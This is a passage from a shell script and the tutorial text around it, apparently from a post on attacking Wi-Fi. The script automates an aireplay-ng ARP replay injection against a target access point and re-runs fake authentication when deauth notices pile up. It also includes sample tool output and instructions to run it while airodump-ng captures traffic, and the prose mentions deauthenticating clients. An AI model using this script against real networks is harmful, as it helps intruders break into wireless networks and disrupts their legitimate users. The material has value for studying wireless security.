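  aireplay-ng -3 -b "$BSSID" -h "$OURMAC" "$IFACE" 2>&1 | while IFS= read -r line; do
    printf '%s\n' "$line"
    case "$(classify_line "$line")" in
      deauth)
        n=$((n + 1))
        if [ "$n" -ge "$THRESHOLD" ]; then fake_auth; n=0; fi ;;
      progress)
        printf 'ARP requests so far: %s\n' "$(arp_requests "$line")" ;;
    esac
  done
}

# Constructed sample output, modelled on the post's transcript.
sample_output() {
  cat <<'EOF'
Saving ARP requests in replay_arp-0123-104950.cap
You should also start airodump-ng to capture replies.
Notice: got a deauth/disassoc packet. Is the source MAC associated ?
Notice: got a deauth/disassoc packet. Is the source MAC associated ?
Notice: got a deauth/disassoc packet. Is the source MAC associated ?
Read 17915 packets (got 3 ARP requests), sent 5854 packets...
EOF
}
```

Run replay_with_watchdog on the monitor-mode interface once airodump-ng is capturing. THRESHOLD is deliberately above 1: a single notice is normal when we deauthenticate clients ourselves, and re-authenticating on every one would flood the AP with association requests.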